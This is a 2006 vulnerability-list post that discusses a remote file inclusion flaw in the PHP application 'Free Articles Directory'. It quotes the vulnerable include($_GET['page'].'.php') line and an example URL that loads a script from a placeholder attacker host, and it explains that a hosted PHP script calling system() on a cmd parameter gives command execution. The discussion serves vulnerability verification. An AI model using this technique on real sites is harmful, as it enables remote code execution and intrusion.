[VIM] Free Articles Directory - file inclusion, code execution?

George A. Theall theall at tenablesecurity.com
Wed Mar 22 09:58:27 EST 2006

Josh Zlatin wrote:

> Looks to me like a clarification, meaning:
> http://[target]/index.php?page=http://[attacker]/evilscript
> opens and runs the php script (note the following code in index.php
> though: include($_GET["page"].".php");

Yes, it does appear to be a remote file include flaw. From index.php,
you have:

  if ($_GET["page"]=='')

> I was unable to run uname -a or any other command I tried via the cmd
> command, but that is probably because the 'cmd' variable is defined as
> the result of the following SQL query:

Actually, it just is passed to whatever URL you pass in via the page
parameter. So all you'd need to run code is a PHP script that calls
system() with the value of cmd.

theall at tenablesecurity.com

More information about the VIM mailing list